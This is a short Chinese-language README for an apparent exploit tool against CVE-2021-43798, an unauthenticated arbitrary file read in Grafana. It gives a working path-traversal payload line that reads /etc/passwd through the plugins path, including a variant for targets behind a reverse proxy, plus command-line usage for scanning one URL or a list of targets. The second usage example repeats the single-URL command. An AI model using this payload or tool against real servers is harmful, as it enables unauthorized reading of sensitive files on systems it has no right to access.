如果对象经过反向代理处理,可以将payload替换成这条
url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。
CVE: CVE-2021-43798
组件: Grafana
漏洞类型: 文件读取
影响: 获取敏感信息
简述: 未授权的攻击者利用该漏洞,能够获取服务器敏感文件
1、对单个URL进行检测
python3 grafana_fileread.py -u http://localhost:3000
获取到的数据能够在grafana 8.x_fileread_vuln.txt文件中查看 2、对文件内的IP进行检测
python3 grafana_fileread.py -u http://localhost:3000